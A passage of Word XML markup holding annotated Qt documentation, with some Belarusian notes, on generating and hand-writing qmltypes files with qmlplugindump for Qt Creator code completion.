        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009127BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>"C:\Qt\5.8\mingw53_32\bin\qmlplugindump.exe" MyModule 1.0 "C:\Qt\5.8\mingw53_32\qml\" &gt; "MyModule\mymodule.qmltypes"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB439E" w:rsidRPr="009127BC" w:rsidRDefault="00DB439E" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009127BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>І я быў у каранёвай папцы праекту.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB439E" w:rsidRPr="00DB439E" w:rsidRDefault="00DB439E" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">У мяне модуль збіраецца, усе файлы збіраюцца, але </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB439E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> не можа выконваць сваю работу з кодам гэтых тыпаў.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E214C" w:rsidRDefault="003E214C" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB439E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Afterwards, </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add the line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>typeinfo mymodule</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmltypes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/tmp/imports/My/Module/qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to register it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">While the qmldump tool covers most cases, </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it does not work if:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The plugin uses a</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlCustomParser</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The component that uses the custom parser will not get its members documented.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The plugin </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can not be loaded</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In particular if you cross-compiled the plugin for a different architecture, qmldump will not be able to load it</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In case you have </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to create a qmltypes file manually</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or need to adjust an existing one, this is the </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file format</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import</w:t>
      </w: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QtQuick</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tooling </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.1</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// There always is a single Module object that contains all</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Component objects.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Module</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A Component object directly corresponds to a type exported</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in a plugin with a call to qmlRegisterType.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Component</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The name is a unique identifier used to refer to this type.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It is recommended you simply use the C++ type name.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name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"QQuickAbstractAnimation"</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The name of the prototype Component.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prototype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"QObject"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The name of the default property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE"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FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>defaultProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"animations"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE"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The name of the type containing attached properties</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE"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FC1DCE">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// and methods.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE"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C1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        attachedType</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"QQuickAnimationAttached"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE"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The list of exports determines how a type can be imported.</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Each string has the format "URI/Name version" and matches the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arguments to qmlRegisterType. Usually types are only exported</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once, if at all.</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If the "URI/" part of the string is missing that means the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type should be put into the package defined by the URI the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module was imported with.</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For example if this module was imported with 'import Foo 4.8'</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the Animation object would be found in the package Foo and</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QtQuick.</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exports</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"Animation 4.7"</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"QtQuick/Animation 1.0"</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The meta object revisions for the exports specified in 'exports'.</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Describes with revisioned properties will be visible in an export.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The list must have exactly the same length as the 'exports' list.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For example the 'animations' propery described below will only be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available through the QtQuick/Animation 1.0 export.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE"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FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exportMetaObjectRevisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
